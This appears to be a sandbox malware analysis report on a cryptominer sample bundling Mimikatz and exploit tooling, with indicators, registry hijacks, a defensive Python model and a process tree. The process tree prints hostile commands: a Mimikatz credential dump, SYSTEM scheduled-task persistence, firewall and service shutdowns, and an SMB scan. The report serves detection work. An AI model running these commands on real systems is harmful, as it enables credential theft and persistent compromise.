Analysis
- max time kernel: 174s
- max time network: 204s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 22-06-2022 00:29
Behavioral task
- behavioral1
- Sample: 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
- Resource: win7-20220414-en
General
- Target: 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
- Size: 4.7MB
- MD5: e2f922fc8900ca88a305101ed7820c53
- SHA1: 6465e375ef71d1df58f532c6cd3db60f9534e69e
- SHA256: 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770
- SHA512: f903de003ea31cbe7deb2f87fd94a46e172534665f7bfa370d2c541971b349ee31c7763c6e34788705941fa4006bd73cb1c974e3e23e54106068ca6413247475
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
XMRig Miner Payload 7 IoCs
Processes (resource: yara_rule):
- C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe: xmrig
- C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe: xmrig
- C:\Windows\Temp\Networks\taskmgr.exe: xmrig
- C:\Windows\TEMP\Networks\taskmgr.exe: xmrig
- C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe: xmrig
- C:\Windows\IME\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe: xmrig
- C:\Windows\IME\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe: xmrig
-
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
The memory dump that matches belongs to PID 1992 (vfshost.exe, the UPX-packed executable dropped under C:\Windows\InfusedAppe\Corporate next to mimidrv.sys and mimilib.dll), so vfshost.exe is the unpacked Mimikatz instance.
Processes (resource: yara_rule):
- C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe: mimikatz
- C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe: mimikatz
- behavioral2/memory/1992-170-0x00007FF6BDF80000-0x00007FF6BE06E000-memory.dmp: mimikatz
- C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe: mimikatz
- C:\Windows\IME\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe: mimikatz
- C:\Windows\IME\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe: mimikatz
-
Executes dropped EXE 8 IoCs
Processes (pid process):
- 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
- 1992 vfshost.exe
- 492 taskmgr.exe
- 3760 wimnat.exe
- 1032 GoogleCdoeUpdate.exe
- 3588 nslfoo.exe
- 5788 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
- 6040 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
-
Sets file execution options in registry 2 TTPs 10 IoCs
An Image File Execution Options (IFEO) Debugger value makes Windows start the named "debugger" instead of the target, with the target's command line appended. Pointing it at svchost.exe, which exits immediately when started without its service arguments, means powershell.exe, wscript.exe, perfmon.exe and the accessibility binaries sethc.exe and magnify.exe can no longer be launched on this host: a defense-evasion and anti-remediation step rather than the classic sticky-keys backdoor (which would point the Debugger at cmd.exe).
Processes (description, ioc; all entries by 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe):
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe
-
UPX packed file 4 IoCs
The heading of this signature was lost in extraction; the entries are the matches of the yara rule upx.
Processes (resource: yara_rule):
- C:\Windows\InfusedAppe\Corporate\vfshost.exe: upx
- C:\Windows\InfusedAppe\Corporate\vfshost.exe: upx
- behavioral2/memory/1992-147-0x00007FF6BDF80000-0x00007FF6BE06E000-memory.dmp: upx
- behavioral2/memory/1992-170-0x00007FF6BDF80000-0x00007FF6BE06E000-memory.dmp: upx
-
Creates a Windows Service
-
Drops file in System32 directory 2 IoCs
Processes (description, ioc, process):
- File created C:\Windows\SysWOW64\nslfoo.exe (wimnat.exe)
- File opened for modification C:\Windows\SysWOW64\nslfoo.exe (wimnat.exe)
-
Drops file in Windows directory 64 IoCs
Note the file set: mimidrv.sys and mimilib.dll are Mimikatz components (driver and library); the DLLs under the specials\ folders (cnli-1, coli-0, crli-0, exma-1, posh-0, tibe-2, trch-1, trfo-2, tucl-1, ucl, xdvl-0, libxml2, zlib1, libeay32, ssleay32) together with svchost.exe/svchost.xml and spoolsrv.exe/spoolsrv.xml match, file for file, the dependency set and XML parameter files shipped with the leaked FuzzBunch exploit framework; scan.bat, ip.txt and Result.txt next to GoogleCdoeUpdate.exe under Priess\ are consistent with the network scanning flagged above. The sample keeps two copies of this tooling, LocalService\ and UnattendGC\, and copies itself to C:\Windows and C:\Windows\ime.
Processes (description, ioc; the process is 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe unless noted):
- File created C:\Windows\InfusedAppe\LocalService\AppCapture_x64.dll
- File created C:\Windows\InfusedAppe\UnattendGC\svchost.xml
- File created C:\Windows\InfusedAppe\UnattendGC\specials\xdvl-0.dll
- File created C:\Windows\spoolsrv.xml
- File created C:\Windows\InfusedAppe\UnattendGC\specials\trch-1.dll
- File created C:\Windows\InfusedAppe\Corporate\vfshost.exe
- File opened for modification C:\Windows\InfusedAppe\Corporate\log.txt (cmd.exe)
- File created C:\Windows\InfusedAppe\LocalService\specials\spoolsrv.exe
- File created C:\Windows\InfusedAppe\LocalService\specials\tibe-2.dll
- File created C:\Windows\InfusedAppe\Corporate\scvhost.exe
- File created C:\Windows\InfusedAppe\UnattendGC\specials\cnli-1.dll
- File created C:\Windows\InfusedAppe\UnattendGC\specials\tibe-2.dll
- File created C:\Windows\InfusedAppe\LocalService\specials\cnli-1.dll
- File created C:\Windows\InfusedAppe\UnattendGC\specials\crli-0.dll
- File created C:\Windows\InfusedAppe\UnattendGC\specials\trfo-2.dll
- File created C:\Windows\InfusedAppe\LocalService\specials\spoolsrv.xml
- File created C:\Windows\InfusedAppe\UnattendGC\specials\spoolsrv.exe
- File created C:\Windows\InfusedAppe\UnattendGC\specials\zlib1.dll
- File created C:\Windows\InfusedAppe\UnattendGC\specials\posh-0.dll
- File opened for modification C:\Windows\spoolsrv.xml
- File created C:\Windows\InfusedAppe\LocalService\specials\svchost.xml
- File opened for modification C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
- File opened for modification C:\Windows\InfusedAppe\Priess\Result.txt (GoogleCdoeUpdate.exe)
- File opened for modification C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
- File created C:\Windows\InfusedAppe\Priess\GoogleCdoeUpdate.exe
- File created C:\Windows\InfusedAppe\UnattendGC\specials\libxml2.dll
- File created C:\Windows\InfusedAppe\LocalService\specials\trch-1.dll
- File created C:\Windows\InfusedAppe\LocalService\specials\ucl.dll
- File created C:\Windows\InfusedAppe\UnattendGC\specials\exma-1.dll
- File created C:\Windows\InfusedAppe\UnattendGC\specials\svchost.exe
- File created C:\Windows\InfusedAppe\UnattendGC\specials\svchost.xml
- File created C:\Windows\InfusedAppe\LocalService\spoolsrv.xml
- File created C:\Windows\InfusedAppe\LocalService\specials\xdvl-0.dll
- File created C:\Windows\InfusedAppe\Corporate\mimidrv.sys
- File created C:\Windows\InfusedAppe\LocalService\specials\coli-0.dll
- File created C:\Windows\InfusedAppe\LocalService\specials\libxml2.dll
- File created C:\Windows\InfusedAppe\Priess\ip.txt
- File opened for modification C:\Windows\svchost.xml
- File created C:\Windows\InfusedAppe\LocalService\svchost.xml
- File created C:\Windows\InfusedAppe\UnattendGC\specials\ucl.dll
- File created C:\Windows\svchost.xml
- File created C:\Windows\InfusedAppe\LocalService\AppCapture_x32.dll
- File created C:\Windows\InfusedAppe\LocalService\specials\tucl-1.dll
- File created C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
- File created C:\Windows\InfusedAppe\UnattendGC\specials\ssleay32.dll
- File created C:\Windows\InfusedAppe\UnattendGC\specials\spoolsrv.xml
- File created C:\Windows\InfusedAppe\LocalService\specials\ssleay32.dll
- File opened for modification C:\Windows\InfusedAppe\Priess\ip.txt
- File created C:\Windows\InfusedAppe\LocalService\specials\svchost.exe
- File created C:\Windows\InfusedAppe\LocalService\specials\trfo-2.dll
- File created C:\Windows\InfusedAppe\LocalService\specials\zlib1.dll
- File created C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
- File created C:\Windows\InfusedAppe\UnattendGC\AppCapture_x32.dll
- File created C:\Windows\InfusedAppe\UnattendGC\specials\coli-0.dll
- File created C:\Windows\InfusedAppe\UnattendGC\specials\tucl-1.dll
- File created C:\Windows\InfusedAppe\LocalService\specials\crli-0.dll
- File created C:\Windows\InfusedAppe\LocalService\specials\libeay32.dll
- File created C:\Windows\InfusedAppe\LocalService\specials\posh-0.dll
- File created C:\Windows\InfusedAppe\Corporate\mimilib.dll
- File created C:\Windows\InfusedAppe\UnattendGC\AppCapture_x64.dll
- File created C:\Windows\InfusedAppe\UnattendGC\spoolsrv.xml
- File created C:\Windows\InfusedAppe\UnattendGC\specials\libeay32.dll
- File created C:\Windows\InfusedAppe\LocalService\specials\exma-1.dll
- File created C:\Windows\InfusedAppe\Priess\scan.bat
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes (pid process):
- 4988 sc.exe
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes (description, ioc, process):
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (nslfoo.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (nslfoo.exe)
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (pid process):
- 3076 schtasks.exe
- 1328 schtasks.exe
- 2400 schtasks.exe
-
Modifies data under HKEY_USERS 10 IoCs
The ZoneMap values are written under .DEFAULT, i.e. the SYSTEM profile, which is what WinINet does when it initialises Internet settings for a process running as SYSTEM; the ActiveMovie\devenum keys are the DirectShow device-enumerator cache created by nslfoo.exe. On their own these writes are weak evidence.
Processes (description, ioc, process):
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft (nslfoo.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie (nslfoo.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum (nslfoo.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software (nslfoo.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum\Version = "7" (nslfoo.exe)
-
Modifies registry class 6 IoCs
Re-pointing the .cmd, .js, .vbs, .VBE, .reg and .bat extensions at the txtfile ProgID makes ShellExecute open such files in Notepad instead of running them through cmd.exe, wscript.exe or regedit.exe. Together with the IFEO entries above this blocks script-based clean-up and competing droppers on the infected host.
Processes (description, ioc; all entries by 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe):
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"
-
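The following is an added example, not code from the report or from the sample, that models what Windows does with the two registry hijacks listed in the IFEO and registry-class signatures above. The IFEO and extension tables are constructed from the values in this report; the stock ProgIDs and shell\open\command strings used for comparison, and the known-debugger and accessibility-binary lists, are this example's own assumptions. `effective_command_line` reproduces the CreateProcess rule (Debugger value first, original command line appended), `shell_open` reproduces the extension to ProgID to open-command resolution, and `classify_ifeo` separates a genuine debugger entry from the sticky-keys style backdoor and from the execution block seen here:

```python
"""Model of the IFEO 'Debugger' hijack and the script-extension -> txtfile
hijack from the report. Added example; registry tables are constructed from
the report, stock handlers and tool lists are assumed."""
import ntpath

# Constructed from the report: image -> Debugger value under
# HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
IFEO = {
    "powershell.exe": r"C:\Windows\system32\svchost.exe",
    "sethc.exe": r"C:\Windows\system32\svchost.exe",
    "magnify.exe": r"C:\Windows\system32\svchost.exe",
    "perfmon.exe": r"C:\Windows\system32\svchost.exe",
    "wscript.exe": r"C:\Windows\system32\svchost.exe",
}
# Constructed from the report: HKLM\SOFTWARE\Classes\<ext> (Default) -> ProgID
HIJACKED_EXT = {".cmd": "txtfile", ".js": "txtfile", ".vbs": "txtfile",
                ".VBE": "txtfile", ".reg": "txtfile", ".bat": "txtfile"}
# Assumed stock associations and shell\open\command values for comparison
DEFAULT_EXT = {".cmd": "cmdfile", ".bat": "batfile", ".js": "JSFile",
               ".vbs": "VBSFile", ".vbe": "VBEFile", ".reg": "regfile"}
OPEN_COMMAND = {
    "txtfile": r"%SystemRoot%\system32\NOTEPAD.EXE %1",
    "batfile": '"%1" %*',
    "cmdfile": '"%1" %*',
    "JSFile": r'%SystemRoot%\System32\WScript.exe "%1" %*',
    "VBSFile": r'%SystemRoot%\System32\WScript.exe "%1" %*',
    "VBEFile": r'%SystemRoot%\System32\WScript.exe "%1" %*',
    "regfile": r'regedit.exe "%1"',
}
KNOWN_DEBUGGERS = {"vsjitdebugger.exe", "windbg.exe", "windbgx.exe", "gflags.exe", "procdump.exe"}
ACCESSIBILITY = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe", "narrator.exe", "displayswitch.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}


def _image(cmd: str) -> str:
    """Base name of the first token of a command line, quoted paths handled."""
    cmd = cmd.strip()
    first = cmd[1:cmd.index('"', 1)] if cmd.startswith('"') else cmd.split()[0]
    return ntpath.basename(first).lower()


def effective_command_line(command_line: str, ifeo=IFEO) -> str:
    """CreateProcess consults IFEO\\<image>\\Debugger; when present the debugger
    is started with the original command line appended. With svchost.exe as
    the 'debugger' the requested image never runs."""
    table = {k.lower(): v for k, v in ifeo.items()}
    debugger = table.get(_image(command_line))
    return f"{debugger} {command_line}" if debugger else command_line


def shell_open(path: str, ext_map=HIJACKED_EXT) -> str:
    """ShellExecute: extension -> ProgID -> shell\\open\\command, %1 and %* expanded."""
    ext = ntpath.splitext(path)[1].lower()
    progid = {k.lower(): v for k, v in ext_map.items()}.get(ext)
    if progid is None:
        raise ValueError(f"no ProgID registered for {ext}")
    return OPEN_COMMAND[progid].replace("%1", path).replace(" %*", "")


def classify_ifeo(image: str, debugger: str) -> str:
    """Triage label for one IFEO Debugger entry."""
    dbg = _image(debugger)
    if dbg in KNOWN_DEBUGGERS:
        return "legitimate-debugger"
    if image.lower() in ACCESSIBILITY and dbg in SHELLS:
        return "accessibility-backdoor"   # the classic sticky-keys swap
    return "execution-block"             # non-debugger target: image is neutralised


def summary(ifeo=IFEO, ext_map=HIJACKED_EXT) -> dict:
    """Consequence of every hijacked image and extension in the snapshot."""
    out = {img: classify_ifeo(img, dbg) for img, dbg in ifeo.items()}
    for ext in ext_map:
        out[ext] = "opens-in-" + _image(shell_open("x" + ext, ext_map))
    return out
```

Run against the report's values, `summary()` labels all five IFEO entries as execution blocks and every hijacked extension as opening in notepad.exe; the same call with `DEFAULT_EXT` shows the normal handlers (wscript.exe for .js/.vbs/.VBE, regedit.exe for .reg, the file itself for .bat/.cmd), which is the state a clean-up has to restore.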
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (pid process), 64 entries in the order listed:
- 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe: 56 entries in three runs, interrupted by the two runs below
- 1992 vfshost.exe: a run of 6 entries after the first run of PID 2544
- 3588 nslfoo.exe: 2 entries near the end, followed by the last run of PID 2544
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
SeLockMemoryPrivilege on taskmgr.exe (the XMRig payload) is the privilege a miner needs for large-page memory; the SeDebugPrivilege requests by the sample and by vfshost.exe (Mimikatz) are what credential dumping from LSASS requires.
Processes (description, pid process), 64 entries in the order listed:
- Token: SeLockMemoryPrivilege 492 taskmgr.exe (1 entry)
- Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe (a run of 5 entries)
- Token: SeDebugPrivilege 1992 vfshost.exe (1 entry)
- Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe (the remaining 57 entries)
-
Suspicious use of SetWindowsHookEx 10 IoCs
Processes (pid process):
- 3476 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe (2 entries)
- 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe (2 entries)
- 3760 wimnat.exe
- 3588 nslfoo.exe
- 5788 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe (2 entries)
- 6040 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe (2 entries)
-
Suspicious use of WriteProcessMemory 64 IoCs
These writes are the ones CreateProcess performs into each new child, so the table is effectively the process tree: the sample (PID 2544) spawns a cmd.exe wrapper per action, and those wrappers run sc.exe (4988), net.exe (3840, 1000, 3928), schtasks.exe (2400, 1328, 3076), nested cmd.exe instances and vfshost.exe (Mimikatz), while the sample starts taskmgr.exe (XMRig) and wimnat.exe directly.
Processes (source pid process -> target pid process; the raw table repeats each pair once per write, count in brackets):
- 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -> 4624 cmd.exe (3)
- 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -> 1344 cmd.exe (3)
- 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -> 3224 cmd.exe (3)
- 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -> 3848 cmd.exe (3)
- 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -> 2156 cmd.exe (3)
- 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -> 408 cmd.exe (3)
- 4624 cmd.exe -> 1992 vfshost.exe (2)
- 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -> 2200 cmd.exe (3)
- 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -> 1692 cmd.exe (3)
- 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -> 492 taskmgr.exe (2)
- 3848 cmd.exe -> 4872 cmd.exe (3)
- 3224 cmd.exe -> 2508 cmd.exe (3)
- 1344 cmd.exe -> 268 cmd.exe (3)
- 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -> 3760 wimnat.exe (3)
- 1692 cmd.exe -> 4988 sc.exe (3)
- 408 cmd.exe -> 3840 net.exe (3)
- 3224 cmd.exe -> 2400 schtasks.exe (3)
- 2200 cmd.exe -> 1000 net.exe (3)
- 1344 cmd.exe -> 1328 schtasks.exe (3)
- 2156 cmd.exe -> 3928 net.exe (3)
- 3848 cmd.exe -> 3076 schtasks.exe (3)
- 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -> 1828 cmd.exe (3)
Processes
-
[level 1] C:\Users\Admin\AppData\Local\Temp\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe"
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
[level 1] C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
    command line: C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
- Executes dropped EXE
- Sets file execution options in registry
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
[level 2] C:\Windows\SysWOW64\cmd.exe
    command line: cmd /c C:\Windows\InfusedAppe\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\InfusedAppe\Corporate\log.txt
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
[level 3] C:\Windows\InfusedAppe\Corporate\vfshost.exe
    command line: C:\Windows\InfusedAppe\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[level 2] C:\Windows\SysWOW64\cmd.exe
    command line: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "MiscfostNsi" /ru system /tr "cmd /c C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe"
- Suspicious use of WriteProcessMemory
-
[level 3] C:\Windows\SysWOW64\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[level 3] C:\Windows\SysWOW64\schtasks.exe
    command line: schtasks /create /sc minute /mo 1 /tn "MiscfostNsi" /ru system /tr "cmd /c C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe"
- Creates scheduled task(s)
-
[level 2] C:\Windows\SysWOW64\cmd.exe
    command line: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "WwANsvc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F"
- Suspicious use of WriteProcessMemory
-
[level 3] C:\Windows\SysWOW64\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[level 3] C:\Windows\SysWOW64\schtasks.exe
    command line: schtasks /create /sc minute /mo 1 /tn "WwANsvc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F"
- Creates scheduled task(s)
-
[level 2] C:\Windows\SysWOW64\cmd.exe
    command line: cmd /c net stop SharedAccess
- Suspicious use of WriteProcessMemory
-
[level 3] C:\Windows\SysWOW64\net.exe
    command line: net stop SharedAccess
-
[level 4] C:\Windows\SysWOW64\net1.exe
    command line: C:\Windows\system32\net1 stop SharedAccess
-
[level 2] C:\Windows\SysWOW64\cmd.exe
    command line: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "HomeGroupProvider" /ru system /tr "cmd /c echo Y|cacls C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe /p everyone:F"
- Suspicious use of WriteProcessMemory
-
[level 3] C:\Windows\SysWOW64\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[level 3] C:\Windows\SysWOW64\schtasks.exe
    command line: schtasks /create /sc minute /mo 1 /tn "HomeGroupProvider" /ru system /tr "cmd /c echo Y|cacls C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe /p everyone:F"
- Creates scheduled task(s)
-
[level 2] C:\Windows\SysWOW64\cmd.exe
    command line: cmd /c net stop LanmanServer
- Suspicious use of WriteProcessMemory
-
[level 3] C:\Windows\SysWOW64\net.exe
    command line: net stop LanmanServer
-
[level 4] C:\Windows\SysWOW64\net1.exe
    command line: C:\Windows\system32\net1 stop LanmanServer
-
[level 2] C:\Windows\TEMP\Networks\taskmgr.exe
    command line: C:\Windows\TEMP\Networks\taskmgr.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
[level 2] C:\Windows\SysWOW64\cmd.exe
    command line: cmd /c sc config LanmanServer start= disabled
- Suspicious use of WriteProcessMemory
-
[level 3] C:\Windows\SysWOW64\sc.exe
    command line: sc config LanmanServer start= disabled
- Launches sc.exe
-
[level 2] C:\Windows\SysWOW64\cmd.exe
    command line: cmd /c net stop MpsSvc
- Suspicious use of WriteProcessMemory
-
[level 3] C:\Windows\SysWOW64\net.exe
    command line: net stop MpsSvc
-
[level 4] C:\Windows\SysWOW64\net1.exe
    command line: C:\Windows\system32\net1 stop MpsSvc
-
[level 2] C:\Windows\TEMP\wimnat.exe
    command line: C:\Windows\TEMP\wimnat.exe
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
[level 2] C:\Windows\SysWOW64\cmd.exe
    command line: cmd.exe /c C:\Windows\InfusedAppe\Priess\scan.bat
-
[level 3] C:\Windows\InfusedAppe\Priess\GoogleCdoeUpdate.exe
    command line: GoogleCdoeUpdate.exe tcp 10.127.0.1 10.127.255.255 445 512 /save
- Executes dropped EXE
- Drops file in Windows directory
-
[level 1] C:\Windows\SysWOW64\nslfoo.exe
    command line: C:\Windows\SysWOW64\nslfoo.exe
- Executes dropped EXE
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
[level 1] C:\Windows\system32\cmd.EXE
    command line: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
-
